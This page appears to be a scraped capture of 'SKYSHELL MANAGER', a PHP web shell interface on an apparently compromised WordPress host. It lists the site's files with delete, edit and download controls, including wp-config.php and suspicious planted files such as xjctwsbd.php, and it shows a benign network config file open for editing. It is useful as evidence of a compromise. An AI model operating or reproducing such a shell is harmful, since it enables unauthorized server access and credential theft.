📁
SKYSHELL MANAGER
PHP v7.4.34
Create
Create
Path:
root
/
home
/
estate38
/
PPE.dlfoffice.com
/
Name
Size
Perm
Actions
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
well-known
-
0755
🗑️
🏷️
🔒
📁
store
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
configWVM
-
0755
🗑️
🏷️
🔒
📁
images
-
0755
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
404LSO
-
0755
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📄
wp-signup.php
34.69 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
32.81 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
3.52 KB
0600
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.98 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.87 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
8.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.71 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.96 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.97 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.7 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.7 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.49 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-active.php
261.01 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.47 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
post-new.php
0.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.1 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
20.27 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess
0.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xjctwsbd.php
18.64 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: rt_dsfield
# Differentiated field values # These include the DSCP and unused bits 0x0 default # Newer RFC2597 values 0x28 AF11 0x30 AF12 0x38 AF13 0x48 AF21 0x50 AF22 0x58 AF23 0x68 AF31 0x70 AF32 0x78 AF33 0x88 AF41 0x90 AF42 0x98 AF43 # Older values RFC2474 0x20 CS1 0x40 CS2 0x60 CS3 0x80 CS4 0xA0 CS5 0xC0 CS6 0xE0 CS7 # RFC 2598 0xB8 EF # Deprecated values dropped upstream # Kept in RHEL for backwards-compatibility 0x00 default 0x10 lowdelay 0x08 throughput 0x04 reliability # This value overlap with ECT, do not use it! 0x02 mincost # These values seems do not want to die, Cisco likes them by a strange reason. 0x20 priority 0x40 immediate 0x60 flash 0x80 flash-override 0xa0 critical 0xc0 internet 0xe0 network
Save